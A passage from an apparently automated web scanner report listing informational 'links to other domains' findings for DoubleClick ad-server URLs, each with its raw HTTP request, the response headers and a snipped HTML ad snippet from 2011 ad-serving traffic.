uUkhSUmFtOUJlRlF4UVhkQlFVRk5RMEZDZEVkNGJWcHhTMnMwTTJ0UlVTWnVkVzA5TVNaemFXYzlRVWRwVjNGMGQwaHlhRlUwTkVzd0xWUndZakEzV0dwMFEzWkdTbUZzVm5oS2R5WmpiR2xsYm5ROVkyRXRjSFZpTFRjME9UUXhOVFl3TWpjd01UZ3pOREltWVdSMWNtdzlDZy0tL2Nsa3VybD0K/clkurl=;ord=541949523?">\n'+
'</SCRIPT>\n'+
'<img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=77482&c5=169976&c6=&cv=1.3&cj=1&rn=1369418474" style="display:none" width="0" height="0" alt="" />';
document.writeln(_amg_345770_content);

18.19. http://ad.doubleclick.net/adi/N1558.NetMining/B5527925 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1558.NetMining/B5527925

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N1558.NetMining/B5527925;sz=728x90;click=;ord=1307963930;click=http://ad.doubleclick.net/click%3Bh=v8/3b25/3/0/*/b%3B239375506%3B0-0%3B1%3B58298669%3B3454-728/90%3B42049626/42067413/1%3Bu=,cm-10119788822_1307963916,120221f8320d7dc,music,ax.180-ak.a-cm.tech_l-cm.cm_xpd5_rtg-dx.13-dx.1-dx.10-dx.12-dx.22-dx.31-dx.34-dx.36-dx.40-dx.bh-dx.bj-dx.bn-dx.bo-dx.bs-wfm.hliv_h-wfm.health_l-idgt.telco_l-bz.25%3B~okv=%3Bnet=cm%3Bu=,cm-10119788822_1307963916,120221f8320d7dc,music,ax.180-ak.a-cm.tech_l-cm.cm_xpd5_rtg-dx.13-dx.1-dx.10-dx.12-dx.22-dx.31-dx.34-dx.36-dx.40-dx.bh-dx.bj-dx.bn-dx.bo-dx.bs-wfm.hliv_h-wfm.health_l-idgt.telco_l-bz.25%3B%3Bcmw=owl%3Bsz=728x90%3Bnet=cm%3Benv=ifr%3Bord1=388700%3Bcontx=music%3Ban=180%3Bdc=w%3Bbtg=ak.a%3Bbtg=cm.tech_l%3Bbtg=cm.cm_xpd5_rtg%3Bbtg=dx.13%3Bbtg=dx.1%3Bbtg=dx.10%3Bbtg=dx.12%3Bbtg=dx.22%3Bbtg=dx.31%3Bbtg=dx.34%3Bbtg=dx.36%3Bbtg=dx.40%3Bbtg=dx.bh%3Bbtg=dx.bj%3Bbtg=dx.bn%3Bbtg=dx.bo%3Bbtg=dx.bs%3Bbtg=wfm.hliv_h%3Bbtg=wfm.health_l%3B~aopt=2/1/e3/0%3B~sscs=?;?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/3086956/dsk6-mac_728x90.jpg

Request

GET /adi/N1558.NetMining/B5527925;sz=728x90;click=;ord=1307963930;click=http://ad.doubleclick.net/click%3Bh=v8/3b25/3/0/*/b%3B239375506%3B0-0%3B1%3B58298669%3B3454-728/90%3B42049626/42067413/1%3Bu=,cm-10119788822_1307963916,120221f8320d7dc,music,ax.180-ak.a-cm.tech_l-cm.cm_xpd5_rtg-dx.13-dx.1-dx.10-dx.12-dx.22-dx.31-dx.34-dx.36-dx.40-dx.bh-dx.bj-dx.bn-dx.bo-dx.bs-wfm.hliv_h-wfm.health_l-idgt.telco_l-bz.25%3B~okv=%3Bnet=cm%3Bu=,cm-10119788822_1307963916,120221f8320d7dc,music,ax.180-ak.a-cm.tech_l-cm.cm_xpd5_rtg-dx.13-dx.1-dx.10-dx.12-dx.22-dx.31-dx.34-dx.36-dx.40-dx.bh-dx.bj-dx.bn-dx.bo-dx.bs-wfm.hliv_h-wfm.health_l-idgt.telco_l-bz.25%3B%3Bcmw=owl%3Bsz=728x90%3Bnet=cm%3Benv=ifr%3Bord1=388700%3Bcontx=music%3Ban=180%3Bdc=w%3Bbtg=ak.a%3Bbtg=cm.tech_l%3Bbtg=cm.cm_xpd5_rtg%3Bbtg=dx.13%3Bbtg=dx.1%3Bbtg=dx.10%3Bbtg=dx.12%3Bbtg=dx.22%3Bbtg=dx.31%3Bbtg=dx.34%3Bbtg=dx.36%3Bbtg=dx.40%3Bbtg=dx.bh%3Bbtg=dx.bj%3Bbtg=dx.bn%3Bbtg=dx.bo%3Bbtg=dx.bs%3Bbtg=wfm.hliv_h%3Bbtg=wfm.health_l%3B~aopt=2/1/e3/0%3B~sscs=?;? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.netmng.com/hic/?nm_width=728&nm_height=90&nm_publ=173&nm_c=225&beacon=March2011&url=4468083&passback&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b25/3/0/%2a/b%3B239375506%3B0-0%3B1%3B58298669%3B3454-728/90%3B42049626/42067413/1%3Bu%3D%2Ccm-10119788822_1307963916%2C120221f8320d7dc%2Cmusic%2Cax.180-ak.a-cm.tech_l-cm.cm_xpd5_rtg-dx.13-dx.1-dx.10-dx.12-dx.22-dx.31-dx.34-dx.36-dx.40-dx.bh-dx.bj-dx.bn-dx.bo-dx.bs-wfm.hliv_h-wfm.health_l-idgt.telco_l-bz.25%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-10119788822_1307963916%2C120221f8320d7dc%2Cmusic%2Cax.180-ak.a-cm.tech_l-cm.cm_xpd5_rtg-dx.13-dx.1-dx.10-dx.12-dx.22-dx.31-dx.34-dx.36-dx.40-dx.bh-dx.bj-dx.bn-dx.bo-dx.bs-wfm.hliv_h-wfm.health_l-idgt.telco_l-bz.25%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D388700%3Bcontx%3Dmusic%3Ban%3D180%3Bdc%3Dw%3Bbtg%3Dak.a%3Bbtg%3Dcm.tech_l%3Bbtg%3Dcm.cm_xpd5_rtg%3Bbtg%3Ddx.13%3Bbtg%3Ddx.1%3Bbtg%3Ddx.10%3Bbtg%3Ddx.12%3Bbtg%3Ddx.22%3Bbtg%3Ddx.31%3Bbtg%3Ddx.34%3Bbtg%3Ddx.36%3Bbtg%3Ddx.40%3Bbtg%3Ddx.bh%3Bbtg%3Ddx.bj%3Bbtg%3Ddx.bn%3Bbtg%3Ddx.bo%3Bbtg%3Ddx.bs%3Bbtg%3Dwfm.hliv_h%3Bbtg%3Dwfm.health_l%3B%7Eaopt%3D2/1/e3/0%3B%7Esscs%3D%3f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 636
Date: Mon, 13 Jun 2011 11:18:50 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b25/4/0/%2a/v;
...[SNIP]...
tech_l-cm.cm_xpd5_rtg-dx.13-dx.1-dx.10-dx.12-dx.22-dx.31-dx.34-dx.36-dx.40-dx.bh-dx.bj-dx.bn-dx.bo-dx.bs-wfm.hliv_h-wfm.health_l-idgt.telco_l-bz.25;~sscs=%3fhttp://www.parallels.com/products/desktop/"><img src="http://s0.2mdn.net/viewad/3086956/dsk6-mac_728x90.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...

18.20. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BxBFZpP_1TbyHBMPhlQex0pyMCafwhJkCr6v7qTXH3I3nWNCgngIQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfnvB-oAwHRA-DL25fwCQph6AOIAugDtQj1AwAAAMA&num=1&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzw&client=ca-pub-7494156027018342&adurl=;ord=1123029870?

The response contains the following links to other domains:

http://s0.2mdn.net/2757332/FathersDay_728x90.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BxBFZpP_1TbyHBMPhlQex0pyMCafwhJkCr6v7qTXH3I3nWNCgngIQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfnvB-oAwHRA-DL25fwCQph6AOIAugDtQj1AwAAAMA&num=1&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzw&client=ca-pub-7494156027018342&adurl=;ord=1123029870? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307985395&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967395234&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307967395282&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1840987920&ga_fc=1&u_tz=-300&u_his=16&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=93&xpc=Qu02yK2fdQ&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6949
Set-Cookie: id=cb231c43800000f||t=1307967399|et=730|cs=n7ym895z; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 12:16:39 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 12:16:39 GMT
Date: Mon, 13 Jun 2011 12:16:39 GMT
Expires: Mon, 13 Jun 2011 12:16:39 GMT
Cache-Control: private

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
j1AwAAAMA&num=1&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzw&client=ca-pub-7494156027018342&adurl=http%3a%2f%2fwww.samsclub.com/sams/pagedetails/content.jsp%3FpageName%3DfathersDay_2011%26pid%3DVML_Fathers"><img src="http://s0.2mdn.net/2757332/FathersDay_728x90.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

18.21. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=B0RX83fT1TYelF4_6lAfYna2LCqfwhJkC36X7qTXH3I3nWICD-QEQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIFyALX57wfqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE&num=1&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQ&client=ca-pub-7494156027018342&adurl=;ord=1392015523?

The response contains the following links to other domains:

http://s0.2mdn.net/2757332/FathersDay_300x250.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=B0RX83fT1TYelF4_6lAfYna2LCqfwhJkC36X7qTXH3I3nWICD-QEQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIFyALX57wfqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE&num=1&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQ&client=ca-pub-7494156027018342&adurl=;ord=1392015523? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307982636&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964636320&bpp=2&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307964636348&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1076203117&ga_fc=1&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=542&xpc=l1rYcbW4k3&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6978
Set-Cookie: id=c29dbc3380000d8||t=1307964640|et=730|cs=xuouziss; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:30:40 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:30:40 GMT
Date: Mon, 13 Jun 2011 11:30:40 GMT
Expires: Mon, 13 Jun 2011 11:30:40 GMT
Cache-Control: private

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
I9QMAAADE&num=1&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQ&client=ca-pub-7494156027018342&adurl=http%3a%2f%2fwww.samsclub.com/sams/pagedetails/content.jsp%3FpageName%3DfathersDay_2011%26pid%3DVML_Fathers"><img src="http://s0.2mdn.net/2757332/FathersDay_300x250.jpg" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

18.22. http://ad.doubleclick.net/adi/N2998.specificmedia.com/B5470646.7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2998.specificmedia.com/B5470646.7

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N2998.specificmedia.com/B5470646.7;sz=728x90;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=2%3Bl=3515%3Bc=152138%3Bb=903239%3Bts=1307963953%3Bdct=;ord=1307963953?

The response contains the following links to other domains:

http://s0.2mdn.net/3135983/1-728x90_ATC_HM_5.2.11.jpg.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 3697
Set-Cookie: id=c7bd0c338000058||t=1307964365|et=730|cs=t1-9vary; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:26:05 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:26:05 GMT
Date: Mon, 13 Jun 2011 11:26:05 GMT
Expires: Mon, 13 Jun 2011 11:26:05 GMT
Cache-Control: private


<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
kv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://clk.specificclick.net/click/v=5%3Bm=2%3Bl=3515%3Bc=152138%3Bb=903239%3Bts=1307963953%3Bdct=http://www.autotrader.com/new-cars.jsp?LNX=ATCNCSPECSTAN"><img src="http://s0.2mdn.net/3135983/1-728x90_ATC_HM_5.2.11.jpg.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

18.23. http://ad.doubleclick.net/adi/N3093.2630.AKAMAITECHNOLOGIES/B4852598.3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3093.2630.AKAMAITECHNOLOGIES/B4852598.3

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3093.2630.AKAMAITECHNOLOGIES/B4852598.3;sz=160x600;click=http://ad.yieldmanager.com/clk?2,13%3B6cf49325784d605d%3B13088ab5f61,0%3B%3B%3B1948746570,UbwUAKamGwArOGcAAAAAAFB0IgAAAAAAAgAAAAoAAAAAAP8AAAACB4gtLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACg6wEAAAAAAAIAAQAAAAAAYV-riDABAAAAAAAAAGI5NTczZWFhLTk1YWMtMTFlMC1iZmI2LTFjYzFkZTA0NDI5MgAAAAAAAAA=,,http%3A%2F%2Fadopt.imiclk.com%2Femb%2Fq%3F01ad%3D2-2-b0214141ded1291a4ff0463d9e06444bd5100362c216df15cc667f2767bc1758-991ad395e12a9826d82de593d62cfbcfae28214d0237d0e3f7994e1df381cb11%2601ri%3D6bdf326c1d1d9d9%2601na%3D%26size%3D160x600%26m%3D3%26l%3D1575606%26c%3D162,http%3A%2F%2Fvt.imiclk.com%2Fcgi%2Fvtc.cgi%3Fm%3D3%26v%3Dc%26c%3D6764587%26z%3D1307962990%26g%3D2258000%26l%3D2960776%26cv%3D0%26cm%3DCPM%26d%3D;ord=1307962990?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2834354/ChuckIt_160x600_3.24.11.jpg

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1209
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:03:10 GMT
Expires: Mon, 13 Jun 2011 11:03:10 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b25/c/2e3/%2a/
...[SNIP]...
com%2Fcgi%2Fvtc.cgi%3Fm%3D3%26v%3Dc%26c%3D6764587%26z%3D1307962990%26g%3D2258000%26l%3D2960776%26cv%3D0%26cm%3DCPM%26d%3Dhttp%3a%2f%2fwww.converse.com/%3FCSID%3D252_kwid/%23/products/featured/ChuckIt"><img src="http://s0.2mdn.net/viewad/2834354/ChuckIt_160x600_3.24.11.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...

18.24. http://ad.doubleclick.net/adi/N3093.2630.AKAMAITECHNOLOGIES/B4852598.3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3093.2630.AKAMAITECHNOLOGIES/B4852598.3

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3093.2630.AKAMAITECHNOLOGIES/B4852598.3;sz=160x600;click=http://ad.yieldmanager.com/clk?2,13%3B6cf49325784d605d%3B13088ab5f61,0%3B%3B%3B1948746570,UbwUAKamGwArOGcAAAAAAFB0IgAAAAAAAgAAAAoAAAAAAP8AAAACB4gtLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACg6wEAAAAAAAIAAQAAAAAAYV-riDABAAAAAAAAAGI5NTczZWFhLTk1YWMtMTFlMC1iZmI2LTFjYzFkZTA0NDI5MgAAAAAAAAA=,,http%3A%2F%2Fadopt.imiclk.com%2Femb%2Fq%3F01ad%3D2-2-b0214141ded1291a4ff0463d9e06444bd5100362c216df15cc667f2767bc1758-991ad395e12a9826d82de593d62cfbcfae28214d0237d0e3f7994e1df381cb11%2601ri%3D6bdf326c1d1d9d9%2601na%3D%26size%3D160x600%26m%3D3%26l%3D1575606%26c%3D162,http%3A%2F%2Fvt.imiclk.com%2Fcgi%2Fvtc.cgi%3Fm%3D3%26v%3Dc%26c%3D6764587%26z%3D1307962990%26g%3D2258000%26l%3D2960776%26cv%3D0%26cm%3DCPM%26d%3D;ord=1307962990?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2834354/AllStarFlag_160x600_5.25.11.jpg

Request

Response

18.25. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N447.153730.YAHOO.COM/B5548365.27

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27;sz=200x33;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15mvt7i2g/M=801902.14713345.14495286.13349988/D=my/S=150001785:RQ1/Y=YAHOO/EXP=1307977870/L=J5ESRGKL8NLm3NorTdAdCwq4rcHW8032DG4ABOOa/B=XLf9D2KL5M0-/J=1307970670356395/K=Pbzv.IR9YBTD3bLqeCG4Tg/A=6407512/R=0/*;ord=0.3826135948766023?

The response contains the following links to other domains:

http://global.ard.yahoo.com/SIG=15mvt7i2g/M=801902.14713345.14495286.13349988/D=my/S=150001785:RQ1/Y=YAHOO/EXP=1307977870/L=J5ESRGKL8NLm3NorTdAdCwq4rcHW8032DG4ABOOa/B=XLf9D2KL5M0-/J=1307970670356395/K=Pbzv.IR9YBTD3bLqeCG4Tg/A=6407512/R=0/*http:/ad.doubleclick.net/click;h=v8/3b25/4/ef/%2a/x;241858033;0-0;0;64369825;3011-200/33;42374177/42391964/1;;~sscs=%3fhttp://www.travelocity.com?WA1=03010&WA2=241858033&WA3=64369825&WA4=42374177&WA5=2995783&WA6=1093499
http://s0.2mdn.net/viewad/2995783/200x33.jpg

Request

GET /adi/N447.153730.YAHOO.COM/B5548365.27;sz=200x33;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15mvt7i2g/M=801902.14713345.14495286.13349988/D=my/S=150001785:RQ1/Y=YAHOO/EXP=1307977870/L=J5ESRGKL8NLm3NorTdAdCwq4rcHW8032DG4ABOOa/B=XLf9D2KL5M0-/J=1307970670356395/K=Pbzv.IR9YBTD3bLqeCG4Tg/A=6407512/R=0/*;ord=0.3826135948766023? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 590
Date: Mon, 13 Jun 2011 13:11:11 GMT

<a target="_blank" href="http://global.ard.yahoo.com/SIG=15mvt7i2g/M=801902.14713345.14495286.13349988/D=my/S=150001785:RQ1/Y=YAHOO/EXP=1307977870/L=J5ESRGKL8NLm3NorTdAdCwq4rcHW8032DG4ABOOa/B=XLf9D2KL5M0-/J=1307970670356395/K=Pbzv.IR9YBTD3bLqeCG4Tg/A=6407512/R=0/*http://ad.doubleclick.net/click;h=v8/3b25/4/ef/%2a/x;241858033;0-0;0;64369825;3011-200/33;42374177/42391964/1;;~sscs=%3fhttp://www.travelocity.com?WA1=03010&WA2=241858033&WA3=64369825&WA4=42374177&WA5=2995783&WA6=1093499"><img src="http://s0.2mdn.net/viewad/2995783/200x33.jpg" border=0 alt="Click here to find out more!"></a>

18.26. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N447.153730.YAHOO.COM/B5548365.27

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27;sz=200x33;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15mtn08vi/M=801902.14713345.14495286.13349988/D=my/S=150001785:RQ1/Y=YAHOO/EXP=1307970640/L=zR1T7mKL8NLm3NorTdAdCwOlrcHW80318C8ABmgZ/B=X1BgBWKL5Sc-/J=1307963440510261/K=HH7rK3zip4GobWLoj7I2TQ/A=6407512/R=0/*;ord=0.16172547359019518?

The response contains the following links to other domains:

http://global.ard.yahoo.com/SIG=15mtn08vi/M=801902.14713345.14495286.13349988/D=my/S=150001785:RQ1/Y=YAHOO/EXP=1307970640/L=zR1T7mKL8NLm3NorTdAdCwOlrcHW80318C8ABmgZ/B=X1BgBWKL5Sc-/J=1307963440510261/K=HH7rK3zip4GobWLoj7I2TQ/A=6407512/R=0/*http:/ad.doubleclick.net/click;h=v8/3b25/4/ef/%2a/x;241858033;0-0;0;64369825;3011-200/33;42374177/42391964/1;;~sscs=%3fhttp://www.travelocity.com?WA1=03010&WA2=241858033&WA3=64369825&WA4=42374177&WA5=2995783&WA6=1093499
http://s0.2mdn.net/viewad/2995783/200x33.jpg

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 590
Set-Cookie: id=c12c6c3380000e3||t=1307964002|et=730|cs=nxaqmpvl; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:20:02 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:20:02 GMT
Date: Mon, 13 Jun 2011 11:20:02 GMT
Expires: Mon, 13 Jun 2011 11:20:02 GMT
Cache-Control: private

<a target="_blank" href="http://global.ard.yahoo.com/SIG=15mtn08vi/M=801902.14713345.14495286.13349988/D=my/S=150001785:RQ1/Y=YAHOO/EXP=1307970640/L=zR1T7mKL8NLm3NorTdAdCwOlrcHW80318C8ABmgZ/B=X1BgBWKL5Sc-/J=1307963440510261/K=HH7rK3zip4GobWLoj7I2TQ/A=6407512/R=0/*http://ad.doubleclick.net/click;h=v8/3b25/4/ef/%2a/x;241858033;0-0;0;64369825;3011-200/33;42374177/42391964/1;;~sscs=%3fhttp://www.travelocity.com?WA1=03010&WA2=241858033&WA3=64369825&WA4=42374177&WA5=2995783&WA6=1093499"><img src="http://s0.2mdn.net/viewad/2995783/200x33.jpg" border=0 alt="Click here to find out more!"></a>

18.27. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27 previous next

